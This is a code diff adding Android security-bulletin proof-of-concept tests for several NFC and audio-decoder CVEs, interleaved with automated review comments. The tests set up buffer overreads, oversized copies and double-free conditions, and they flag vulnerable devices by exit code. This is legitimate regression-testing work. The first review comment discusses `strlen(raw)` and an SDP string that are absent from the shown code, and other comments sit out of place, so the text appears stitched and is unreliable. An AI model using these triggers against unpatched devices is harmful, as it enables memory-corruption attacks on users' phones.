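Review bot: `strlen(raw)` is called although the file includes only `<stdlib.h>` and the two stagefright headers, so it compiles only while one of those happens to declare it; add `#include <string.h>`. The SDP text also has no comment saying which attribute of the session description the long `config=` value is meant to exercise. One line above `raw` naming the parser path under test would let a maintainer tell a meaningful input from filler.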
@@ -0,0 +1,34 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+cc_test {
+ name: "CVE-2019-2099",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ],
+ compile_multilib: "64",
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ "system/nfc/src/nfa/include/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/poc.cpp
new file mode 100644
index 00000000000..8cfa619138f
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2099/poc.cpp
@@ -0,0 +1,122 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <dlfcn.h> +#include <nfa_rw_int.h> +#include <nfc_int.h> +#include <rw_int.h> +#include <stdlib.h> +#include "../includes/common.h" + +#define LENGTH 0xBEB + +extern tRW_CB rw_cb; +extern tNFC_CB nfc_cb; +void rw_init(void); +void NFA_Init(tHAL_NFC_ENTRY *p_hal_entry_tbl); +bool nfa_rw_activate_ntf(tNFA_RW_MSG *p_data); + +bool isInitialized = false; + +static void *(*real_memcpy)(void *to, const void *from, size_t numBytes) = nullptr; + +void init(void) { + real_memcpy = (void *(*)(void *, const void *, size_t))dlsym(RTLD_NEXT, "memcpy"); + if (real_memcpy == nullptr) { + return; + } + isInitialized = true; +} + +void *memcpy(void *to, const void *from, size_t numBytes) { + if (!isInitialized) { + init(); + } + if (numBytes == LENGTH) { + exit(EXIT_VULNERABLE); + } + return real_memcpy(to, from, numBytes); +} + +int freeResourcesAndReturn(int status, tNFA_RW_MSG *ptr1 = nullptr, + tNFC_ACTIVATE_DEVT *ptr2 = nullptr, tRW_DATA *ptr3 = nullptr, + NFC_HDR *ptr4 = nullptr, uint8_t *ptr5 = nullptr) { + if (ptr1) { + if (ptr2) { + free(ptr2); + } + free(ptr1); + } + if (ptr3) { + if (ptr4) { + free(ptr4); + } + free(ptr3); + } + if (ptr5) { + free(ptr5); + } + return status; +} + +int main() { + GKI_init(); + rw_init(); + tHAL_NFC_ENTRY p_hal_entry_tbl; + NFA_Init(&p_hal_entry_tbl); + + tNFA_RW_MSG *p_data = (tNFA_RW_MSG 
*)malloc(sizeof(tNFA_RW_MSG)); + if (!p_data) { + return EXIT_FAILURE; + } + p_data->activate_ntf.p_activate_params = + (tNFC_ACTIVATE_DEVT *)malloc(sizeof(tNFC_ACTIVATE_DEVT)); + if (!(p_data->activate_ntf.p_activate_params)) { + return freeResourcesAndReturn(EXIT_FAILURE, p_data); + } + + tNFC_ACTIVATE_DEVT *p_activate_params = p_data->activate_ntf.p_activate_params; + p_activate_params->protocol = NFC_PROTOCOL_T2T; + + nfa_rw_activate_ntf(p_data); + + tRW_CBACK *p_cback = rw_cb.p_cback; + tRW_DATA *p_rw_data = (tRW_DATA *)malloc(sizeof(tRW_DATA)); + if (!p_rw_data) { + return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params); + } + + nfa_rw_cb.cur_op = NFA_RW_OP_READ_NDEF; + p_rw_data->data.p_data = (NFC_HDR *)malloc(sizeof(NFC_HDR)); + if (!(p_rw_data->data.p_data)) { + return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params, + p_rw_data); + } + + nfa_rw_cb.p_ndef_buf = (uint8_t *)malloc(sizeof(uint8_t)); + if (!(nfa_rw_cb.p_ndef_buf)) { + return freeResourcesAndReturn(EXIT_FAILURE, p_data, p_data->activate_ntf.p_activate_params, + p_rw_data, p_rw_data->data.p_data); + } + + p_rw_data->data.p_data->len = LENGTH; + if (p_cback) { + p_cback(RW_T3T_CHECK_EVT, p_rw_data); + } + + return freeResourcesAndReturn(EXIT_SUCCESS, p_data, p_data->activate_ntf.p_activate_params, + p_rw_data, p_rw_data->data.p_data, nfa_rw_cb.p_ndef_buf); +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp index a7eef920cbd..eb42b96323f 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2133/Android.bp @@ -22,9 +22,6 @@ cc_test { "poc.cpp", ], multilib: { - lib32: { - suffix: "32", - }, lib64: { include_dirs: [ "packages/apps/Nfc/nci/jni/extns/pn54x/src/mifare/", 
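Review bot: When `dlsym(RTLD_NEXT, "memcpy")` fails, `init()` returns with `real_memcpy` still null and the wrapper falls through to `return real_memcpy(to, from, numBytes);`, so the PoC dies on a null call instead of reporting a setup failure. A guard right after the `init()` call, `if (real_memcpy == nullptr) exit(EXIT_FAILURE);`, keeps that crash from being read as the vulnerability signal. Separately, the `NFC_HDR` in `p_rw_data->data.p_data` has only `len` assigned; `offset` is still uninitialised when `p_cback` runs.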
@@ -39,7 +36,6 @@ cc_test { shared_libs: [ "libnfc_nci_jni", ], - suffix: "64", }, }, } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp index 3bbda28f506..c8353feb305 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2134/Android.bp @@ -22,9 +22,6 @@ cc_test { "poc.cpp", ], multilib: { - lib32: { - suffix: "32", - }, lib64: { include_dirs: [ "packages/apps/Nfc/nci/jni/extns/pn54x/src/mifare/", @@ -39,7 +36,6 @@ cc_test { shared_libs: [ "libnfc_nci_jni", ], - suffix: "64", }, }, } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/Android.bp new file mode 100644 index 00000000000..55a41e311ba --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/Android.bp 
@@ -0,0 +1,42 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2019-2206", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + "system/nfc/src/nfa/include/", + ], + shared_libs: [ + "libnfc-nci", + "libchrome", + "libbase", + "liblog", + ], + cflags: [ + "-DCHECK_OVERFLOW", + ] +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/poc.cpp new file mode 100644 index 00000000000..f40a7f20c8a --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2206/poc.cpp 
@@ -0,0 +1,123 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <nfc_api.h> +#include <nfc_int.h> +#include <rw_int.h> +#include <stdlib.h> +#include <tags_defs.h> + +#define RWLENGTH 32 +#define PLENGTH 1 +#define OFFSET 7 + +// borrowed from rw_i93.cc +extern tRW_CB rw_cb; +extern tNFC_CB nfc_cb; +void rw_init(void); +tNFC_STATUS rw_i93_select(uint8_t *p_uid); + +// borrowed from rw_i93.cc +enum { + RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */ + RW_I93_STATE_IDLE, /* waiting for upper layer API */ + RW_I93_STATE_BUSY, /* waiting for response from tag */ + + RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */ + RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */ + RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */ + RW_I93_STATE_FORMAT, /* performing format procedure */ + RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */ + + RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */ +}; + +// borrowed from rw_i93.cc +enum { + RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */ + RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */ + RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */ + RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */ + RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */ + + RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to 
update NDEF TLV */ + RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */ + RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */ + + RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */ + RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */ + RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV + */ + + RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */ + RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */ + RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */ +}; + +void GKI_freebuf(void *p_buf __attribute__((unused))) {} + +void GKI_start_timer(uint8_t, int32_t, bool) {} + +void GKI_stop_timer(uint8_t) {} + +int main() { + tRW_I93_CB *p_i93 = &rw_cb.tcb.i93; + + GKI_init(); + rw_init(); + + uint8_t p_uid = 1; + if (rw_i93_select(&p_uid) != NFC_STATUS_OK) { + return EXIT_FAILURE; + } + + tNFC_CONN_CB *p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID]; + tNFC_CONN_EVT event = NFC_DATA_CEVT; + + tNFC_CONN *p_data = (tNFC_CONN *)malloc(sizeof(tNFC_CONN)); + + if (!p_data) { + return EXIT_FAILURE; + } + + p_data->data.p_data = + (NFC_HDR *)malloc(sizeof(uint8_t) * (OFFSET + PLENGTH) * 2); + + if (!(p_data->data.p_data)) { + free(p_data); + return EXIT_FAILURE; + } + + p_i93->state = RW_I93_STATE_SET_READ_ONLY; + p_i93->sub_state = RW_I93_SUBSTATE_WAIT_CC; + p_i93->block_size = 1; + + p_i93->ndef_tlv_start_offset = 0; + p_i93->rw_length = RWLENGTH; + p_i93->ndef_length = p_i93->rw_length * 2; + + p_data->status = NFC_STATUS_OK; + NFC_HDR *p_resp = (NFC_HDR *)p_data->data.p_data; + p_resp->len = PLENGTH; + p_resp->offset = OFFSET; + + p_cb->p_cback(0, event, p_data); + + free(p_data->data.p_data); + free(p_data); + + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/Android.bp new file mode 100644 index 00000000000..114756431a4 --- /dev/null 
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/Android.bp @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2019-2207", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ":cts_hostsidetests_securitybulletin_memutils", + ], + compile_multilib: "64", + include_dirs: [ + "system/nfc/src/nfc/include/", + "system/nfc/src/include/", + "system/nfc/src/gki/common/", + "system/nfc/src/gki/ulinux/", + "system/nfc/src/nfa/include/", + ], + shared_libs: [ + "libnfc-nci", + ], + cflags: [ + "-DCHECK_OVERFLOW", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/poc.cpp new file mode 100644 index 00000000000..f94ee94d10f --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-2207/poc.cpp 
@@ -0,0 +1,36 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include "nfa_hci_defs.h"
+#include "nfa_hci_int.h"
+#define SIZE 16
+
+extern tNFA_HCI_CB nfa_hci_cb;
+
+int main() {
+ nfa_hci_cb.cmd_sent = NFA_HCI_ANY_GET_PARAMETER;
+ nfa_hci_cb.param_in_use = NFA_HCI_HOST_LIST_INDEX;
+ uint8_t data_len = SIZE * 6;
+ uint8_t *data = (uint8_t *)malloc(SIZE);
+ if (!data) {
+ return EXIT_FAILURE;
+ }
+ nfa_hci_handle_admin_gate_rsp(data, data_len);
+ free(data);
+
+ return EXIT_SUCCESS;
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp
index f388f89ef39..720a76d2b9d 100644
--- a/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2019-9362/poc.cpp
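Review bot: `data_len` is set to `SIZE * 6` while `data` is allocated with only `SIZE` bytes, and nothing says the mismatch is deliberate, so a reader cannot tell a test precondition from a typo. A comment above the call such as `// data_len deliberately exceeds the allocation; the handler must bound its reads` would record the intent. The buffer contents are also uninitialised, so `calloc(1, SIZE)` would make the bytes the handler parses the same on every run.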
@@ -20,135 +20,60 @@ #define MAX_PARAMETER_SETS (9) #define MAX_NUM_OTT (5) - -#define RETURN_EXIT_FAILURE_IF_NULL(ptr) \ - { \ - if (!ptr) { \ - return freeAllocatedMemoryAndReturn(frame, decoder, EXIT_FAILURE); \ - } \ - } +#define ARR_SIZE (16) typedef signed char SCHAR; -int freeAllocatedMemoryAndReturn(SPATIAL_BS_FRAME *frame, spatialDec *decoder, - int errorCode) { - if (frame) { - if (frame->CLDLosslessData) { - for (int i = 0; i < MAX_NUM_OTT; ++i) { - if ((&frame->CLDLosslessData[i])->state) { - free((&frame->CLDLosslessData[i])->state); - (&frame->CLDLosslessData[i])->state = nullptr; - } - } - free(frame->CLDLosslessData); - frame->CLDLosslessData = nullptr; - } - if (frame->ICCLosslessData) { - free(frame->ICCLosslessData); - frame->ICCLosslessData = nullptr; - } - if (frame->IPDLosslessData) { - free(frame->IPDLosslessData); - frame->IPDLosslessData = nullptr; - } - free(frame); - frame = nullptr; - } - - if (decoder) { - if (decoder->pConfigCurrent) { - free(decoder->pConfigCurrent); - decoder->pConfigCurrent = nullptr; - } - if (decoder->ottCLDidxPrev) { - free(decoder->ottCLDidxPrev); - decoder->ottCLDidxPrev = nullptr; - } - if (decoder->smgTime) { - free(decoder->smgTime); - decoder->smgTime = nullptr; - } - if (decoder->smgData) { - free(decoder->smgData); - decoder->smgData = nullptr; - } - if (decoder->smoothState) { - free(decoder->smoothState); - decoder->smoothState = nullptr; - } - free(decoder); - decoder = nullptr; - } - return errorCode; -} - int main() { - spatialDec *decoder = (spatialDec *)malloc(sizeof(spatialDec)); - if (!decoder) { - return EXIT_FAILURE; - } - SPATIAL_BS_FRAME *frame = - (SPATIAL_BS_FRAME *)malloc(sizeof(SPATIAL_BS_FRAME)); + spatialDec decoder; + memset(&decoder, 0x0, sizeof(spatialDec)); - RETURN_EXIT_FAILURE_IF_NULL(frame); - memset(frame, 0x00, sizeof(SPATIAL_BS_FRAME)); + decoder.numOttBoxes = MAX_NUM_OTT; - RETURN_EXIT_FAILURE_IF_NULL(decoder); - memset(decoder, 0x00, sizeof(spatialDec)); + 
SPATIAL_SPECIFIC_CONFIG pConfigCurrent; + memset(&pConfigCurrent, 0x0, sizeof(SPATIAL_SPECIFIC_CONFIG)); + decoder.pConfigCurrent = &pConfigCurrent; - size_t allocSize = sizeof(LOSSLESSDATA) * MAX_NUM_OTT * MAX_NUM_PARAMETERS; + SCHAR ottCLDidxPrev[ARR_SIZE] = {}; + decoder.ottCLDidxPrev = (SCHAR **)&ottCLDidxPrev; - frame->CLDLosslessData = (LOSSLESSDATA *)malloc(allocSize); - RETURN_EXIT_FAILURE_IF_NULL(frame->CLDLosslessData); - memset(frame->CLDLosslessData, 0x00, allocSize); + int smgTime = 1; + decoder.smgTime = &smgTime; - frame->ICCLosslessData = (LOSSLESSDATA *)malloc(allocSize); - RETURN_EXIT_FAILURE_IF_NULL(frame->ICCLosslessData); - memset(frame->CLDLosslessData, 0x00, allocSize); + UCHAR smgData[ARR_SIZE] = {}; + decoder.smgData = (UCHAR **)&smgData; - frame->IPDLosslessData = (LOSSLESSDATA *)malloc(allocSize); - RETURN_EXIT_FAILURE_IF_NULL(frame->IPDLosslessData); - memset(frame->CLDLosslessData, 0x00, allocSize); + SMOOTHING_STATE smoothState; + memset(&smoothState, 0x0, sizeof(SMOOTHING_STATE)); + decoder.smoothState = &smoothState; - frame->numParameterSets = MAX_PARAMETER_SETS; - - for (int i = 0; i < MAX_NUM_OTT; ++i) { - (&frame->CLDLosslessData[i])->state = nullptr; - for (int j = 0; j < MAX_PARAMETER_SETS; ++j) { - (&frame->CLDLosslessData[i])->bsXXXDataMode[j] = 2; - } - (&frame->CLDLosslessData[i])->state = - (LOSSLESSSTATE *)malloc(sizeof(LOSSLESSSTATE)); - RETURN_EXIT_FAILURE_IF_NULL((&frame->CLDLosslessData[i])->state); - memset((&frame->CLDLosslessData[i])->state, 0x00, sizeof(LOSSLESSSTATE)); - } + decoder.arbitraryDownmix = 0; + (decoder.concealInfo).concealState = SpatialDecConcealState_Ok; - decoder->numOttBoxes = MAX_NUM_OTT; + const size_t allocSize = MAX_NUM_OTT * MAX_NUM_PARAMETERS; - decoder->pConfigCurrent = - (SPATIAL_SPECIFIC_CONFIG *)malloc(sizeof(SPATIAL_SPECIFIC_CONFIG)); - RETURN_EXIT_FAILURE_IF_NULL(decoder->pConfigCurrent); - memset(decoder->pConfigCurrent, 0x00, sizeof(SPATIAL_SPECIFIC_CONFIG)); + SPATIAL_BS_FRAME 
frame; + memset(&frame, 0x0, sizeof(SPATIAL_BS_FRAME)); - decoder->ottCLDidxPrev = (SCHAR **)malloc(sizeof(SCHAR *)); - RETURN_EXIT_FAILURE_IF_NULL(decoder->ottCLDidxPrev); - memset(decoder->ottCLDidxPrev, 0x00, sizeof(SCHAR *)); + frame.numParameterSets = MAX_PARAMETER_SETS; - decoder->smgTime = (int *)malloc(sizeof(int)); - RETURN_EXIT_FAILURE_IF_NULL(decoder->smgTime); - memset(decoder->smgTime, 0x00, sizeof(int)); + LOSSLESSDATA CLDLosslessData[allocSize] = {}; + frame.CLDLosslessData = CLDLosslessData; - decoder->smgData = (UCHAR **)malloc(sizeof(UCHAR *)); - RETURN_EXIT_FAILURE_IF_NULL(decoder->smgData); - memset(decoder->smgData, 0x00, sizeof(UCHAR *)); + LOSSLESSDATA ICCLosslessData[allocSize] = {}; + frame.ICCLosslessData = ICCLosslessData; - decoder->smoothState = (SMOOTHING_STATE *)malloc(sizeof(SMOOTHING_STATE)); - RETURN_EXIT_FAILURE_IF_NULL(decoder->smoothState); - memset(decoder->smoothState, 0x00, sizeof(SMOOTHING_STATE)); + LOSSLESSDATA IPDLosslessData[allocSize] = {}; + frame.IPDLosslessData = IPDLosslessData; - decoder->arbitraryDownmix = 0; - (decoder->concealInfo).concealState = SpatialDecConcealState_Ok; + for (int i = 0; i < MAX_NUM_OTT; ++i) { + for (int j = 0; j < MAX_PARAMETER_SETS; ++j) { + (frame.CLDLosslessData[i]).bsXXXDataMode[j] = 2; + } + LOSSLESSSTATE lossLessState; + (frame.CLDLosslessData[i]).state = &lossLessState; + } - SpatialDecDecodeFrame(decoder, frame); - return freeAllocatedMemoryAndReturn(frame, decoder, EXIT_SUCCESS); + SpatialDecDecodeFrame(&decoder, &frame); + return EXIT_SUCCESS; } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/Android.bp new file mode 100644 index 00000000000..dbb07bc0870 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/Android.bp 
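Review bot: `LOSSLESSSTATE lossLessState;` is declared inside the `for` body, so each `CLDLosslessData[i].state` keeps the address of a local whose lifetime ends with that iteration, and `SpatialDecDecodeFrame(&decoder, &frame)` then runs with dangling pointers. The object is also left uninitialised, whereas the removed code zeroed every state with `memset`. Declaring `LOSSLESSSTATE lossLessState[MAX_NUM_OTT] = {};` before the loop and assigning `(frame.CLDLosslessData[i]).state = &lossLessState[i];` gives each box its own zeroed state that outlives the decode call. The hunk starts below the file's includes, so the head of the file is not visible here.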
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at:
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ *
+ */
+
+cc_test {
+ name: "CVE-2020-0006",
+ defaults: ["cts_hostsidetests_securitybulletin_defaults"],
+ srcs: [
+ "poc.cpp",
+ ":cts_hostsidetests_securitybulletin_memutils",
+ ],
+ compile_multilib: "64",
+ cflags: [
+ "-DCHECK_OVERFLOW",
+ "-DENABLE_SELECTIVE_OVERLOADING",
+ ],
+ include_dirs: [
+ "system/nfc/src/nfc/include/",
+ "system/nfc/src/include/",
+ "system/nfc/src/gki/common/",
+ "system/nfc/src/gki/ulinux/",
+ ],
+ shared_libs: [
+ "libnfc-nci",
+ ],
+}
diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/poc.cpp
new file mode 100644
index 00000000000..e90150e9c43
--- /dev/null
+++ b/hostsidetests/securitybulletin/securityPatch/CVE-2020-0006/poc.cpp
@@ -0,0 +1,126 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#include <stdlib.h>
+#include <nfc_api.h>
+#include <nfc_int.h>
+#include <rw_int.h>
+#include <tags_defs.h>
+
+#include "../includes/common.h"
+#include "../includes/memutils.h"
+
+char enable_selective_overload = ENABLE_NONE;
+
+// borrowed from rw_i93.cc
+#define RW_I93_FORMAT_DATA_LEN 8
+
+extern tRW_CB rw_cb;
+extern tNFC_CB nfc_cb;
+void rw_init(void);
+tNFC_STATUS rw_i93_select(uint8_t* p_uid);
+void* vulnerable_ptr;
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_STATE_NOT_ACTIVATED, /* ISO15693 is not activated */
+ RW_I93_STATE_IDLE, /* waiting for upper layer API */
+ RW_I93_STATE_BUSY, /* waiting for response from tag */
+
+ RW_I93_STATE_DETECT_NDEF, /* performing NDEF detection precedure */
+ RW_I93_STATE_READ_NDEF, /* performing read NDEF procedure */
+ RW_I93_STATE_UPDATE_NDEF, /* performing update NDEF procedure */
+ RW_I93_STATE_FORMAT, /* performing format procedure */
+ RW_I93_STATE_SET_READ_ONLY, /* performing set read-only procedure */
+
+ RW_I93_STATE_PRESENCE_CHECK /* checking presence of tag */
+};
+
+// borrowed from rw_i93.cc
+enum {
+ RW_I93_SUBSTATE_WAIT_UID, /* waiting for response of inventory */
+ RW_I93_SUBSTATE_WAIT_SYS_INFO, /* waiting for response of get sys info */
+ RW_I93_SUBSTATE_WAIT_CC, /* waiting for reading CC */
+ RW_I93_SUBSTATE_SEARCH_NDEF_TLV, /* searching NDEF TLV */
+ RW_I93_SUBSTATE_CHECK_LOCK_STATUS, /* check if any NDEF TLV is locked */
+
+ RW_I93_SUBSTATE_RESET_LEN, /* set length to 0 to update NDEF TLV */
+ RW_I93_SUBSTATE_WRITE_NDEF, /* writing NDEF and Terminator TLV */
+ RW_I93_SUBSTATE_UPDATE_LEN, /* set length into NDEF TLV */
+
+ RW_I93_SUBSTATE_WAIT_RESET_DSFID_AFI, /* reset DSFID and AFI */
+ RW_I93_SUBSTATE_CHECK_READ_ONLY, /* check if any block is locked */
+ RW_I93_SUBSTATE_WRITE_CC_NDEF_TLV, /* write CC and empty NDEF/Terminator TLV
+ */
+
+ RW_I93_SUBSTATE_WAIT_UPDATE_CC, /* updating CC as read-only */
+ RW_I93_SUBSTATE_LOCK_NDEF_TLV, /* lock blocks of NDEF TLV */
+ RW_I93_SUBSTATE_WAIT_LOCK_CC /* lock block of CC */
+};
+
+void* GKI_getbuf(uint16_t size) {
+ void* ptr = malloc(size);
+ if (size == RW_I93_FORMAT_DATA_LEN) {
+ vulnerable_ptr = ptr;
+ }
+ return ptr;
+}
+
+void GKI_freebuf(void* p_buf) {
+ if (p_buf == vulnerable_ptr) {
+ free(p_buf);
+ }
+}
+
+int main() {
+ enable_selective_overload = ENABLE_ALL;
+ tRW_I93_CB* p_i93 = &rw_cb.tcb.i93;
+
+ GKI_init();
+ rw_init();
+
+ uint8_t p_uid = 1;
+ if (rw_i93_select(&p_uid) != NFC_STATUS_OK) {
+ return EXIT_FAILURE;
+ }
+
+ tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
+ tNFC_CONN_EVT event = NFC_DATA_CEVT;
+
+ tNFC_CONN* p_data = (tNFC_CONN*)malloc(sizeof(tNFC_CONN));
+ if (!p_data) {
+ return EXIT_FAILURE;
+ }
+
+ p_data->data.p_data = (NFC_HDR*)malloc(sizeof(NFC_HDR));
+ if (!(p_data->data.p_data)) {
+ free(p_data);
+ return EXIT_FAILURE;
+ }
+
+ p_i93->state = RW_I93_STATE_FORMAT;
+ p_i93->sub_state = RW_I93_SUBSTATE_CHECK_READ_ONLY;
+ p_i93->block_size = I93_MAX_BLOCK_LENGH - 1;
+ p_data->status = NFC_STATUS_OK;
+ TIMER_LIST_ENT pFirst = {};
+ nfc_cb.quick_timer_queue.p_first = &pFirst;
+
+ p_cb->p_cback(0, event, p_data);
+ free(p_data->data.p_data);
+ free(p_data);
+ enable_selective_overload = ENABLE_NONE;
+ return EXIT_SUCCESS;
+}
